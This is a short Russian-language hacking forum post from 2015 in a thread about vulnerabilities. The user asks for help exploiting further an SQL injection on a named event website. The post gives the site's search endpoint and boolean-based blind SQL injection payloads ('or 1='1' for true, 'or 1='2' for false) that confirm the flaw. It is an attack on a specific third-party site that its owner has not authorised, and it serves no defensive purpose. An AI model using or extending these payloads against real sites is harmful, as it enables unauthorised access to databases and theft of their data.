Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #8  
Старый 24.05.2015, 17:34
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию
Помогите раскрутить.

.SpoilerTarget" type="button">Spoiler
http://myevent.com/1/helpcenter.htm

уязвимое поле - поиск

в итоге поулчаем запрос

http://myevent.com/submit.php

POST

searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE

searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE
 
Ответить с цитированием